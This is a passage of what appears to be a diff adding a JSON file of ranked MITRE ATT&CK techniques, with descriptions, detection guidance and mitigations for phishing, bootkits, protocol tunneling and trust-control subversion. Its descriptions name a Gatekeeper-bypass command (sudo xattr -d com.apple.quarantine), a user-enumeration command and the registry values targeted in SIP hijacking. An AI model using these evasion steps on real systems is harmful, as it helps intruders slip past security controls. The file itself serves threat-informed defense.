specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to Steal Application Access Tokens, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)", + "url": "https://attack.mitre.org/techniques/T1566/002", + "detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections take place once User Execution occurs.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1566.003", + "name": "Phishing: Spearphishing via Service", + "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", + "url": "https://attack.mitre.org/techniques/T1566/003", + "detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution or usage of malicious scripts.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ] + } + ] + }, + { + "rank": 64, + "tid": "T1018", + "name": "Remote System Discovery", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or net view using Net. Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. ", + "url": "https://attack.mitre.org/techniques/T1018", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\nMonitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", + "score": 0.9028828804533333, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 65, + "tid": "T1033", + "name": "System Owner/User Discovery", + "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.", + "url": "https://attack.mitre.org/techniques/T1033", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.8997925136628571, + "process_score": 0.2, + "file_score": 0.2, + "cloud_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 66, + "tid": "T1104", + "name": "Multi-Stage Channels", + "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.", + "url": "https://attack.mitre.org/techniques/T1104", + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.", + "score": 0.89965205016, + "process_score": 0.2, + "file_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [] + }, + { + "rank": 67, + "tid": "T1542", + "name": "Pre-OS Boot", + "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.", + "url": "https://attack.mitre.org/techniques/T1542", + "detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)", + "score": 0.8971252238942857, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [ + { + "tid": "T1542.001", + "name": "Pre-OS Boot: System Firmware", + "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", + "url": "https://attack.mitre.org/techniques/T1542/001", + "detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1542.002", + "name": "Pre-OS Boot: Component Firmware", + "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", + "url": "https://attack.mitre.org/techniques/T1542/002", + "detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.", + "mitigations": [] + }, + { + "tid": "T1542.003", + "name": "Pre-OS Boot: Bootkit", + "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.", + "url": "https://attack.mitre.org/techniques/T1542/003", + "detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + } + ] + }, + { + "tid": "T1542.004", + "name": "Pre-OS Boot: ROMMONkit", + "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to TFTP Boot, an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.", + "url": "https://attack.mitre.org/techniques/T1542/004", + "detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1542.005", + "name": "Pre-OS Boot: TFTP Boot", + "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with Modify System Image to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to ROMMONkit and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)", + "url": "https://attack.mitre.org/techniques/T1542/005", + "detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 68, + "tid": "T1572", + "name": "Protocol Tunneling", + "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \nProtocol Tunneling may also be abused by adversaries during Dynamic Resolution. Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \nAdversaries may also leverage Protocol Tunneling in conjunction with Proxy and/or Protocol Impersonation to further conceal C2 communications and infrastructure. ", + "url": "https://attack.mitre.org/techniques/T1572", + "detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "score": 0.8914711493695238, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "subtechniques": [] + }, + { + "rank": 69, + "tid": "T1203", + "name": "Exploitation for Client Execution", + "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\nSeveral types exist:\n

Browser-based Exploitation

\nWeb browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n

Office Applications

\nCommon office and productivity applications such as Microsoft Office are also targeted through Phishing. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n

Common Third-party Applications

\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", + "url": "https://attack.mitre.org/techniques/T1203", + "detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", + "score": 0.8816301594419049, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + } + ], + "subtechniques": [] + }, + { + "rank": 70, + "tid": "T1553", + "name": "Subvert Trust Controls", + "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct File and Directory Permissions Modification or Modify Registry in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) ", + "url": "https://attack.mitre.org/techniques/T1553", + "detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ", + "score": 0.8807632006019048, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "subtechniques": [ + { + "tid": "T1553.001", + "name": "Subvert Trust Controls: Gatekeeper Bypass", + "description": "Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)\nThe quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)\nApps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using Drive-by Compromise, which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)", + "url": "https://attack.mitre.org/techniques/T1553/001", + "detection": "The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \nReview false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \nQuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1553.002", + "name": "Subvert Trust Controls: Code Signing", + "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike Invalid Code Signature, this activity will result in a valid signature.\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ", + "url": "https://attack.mitre.org/techniques/T1553/002", + "detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.", + "mitigations": [] + }, + { + "tid": "T1553.003", + "name": "Subvert Trust Controls: SIP and Trust Provider Hijacking", + "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\nSimilar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n
    \n
  • Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
    • \n
  • Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
    • \n
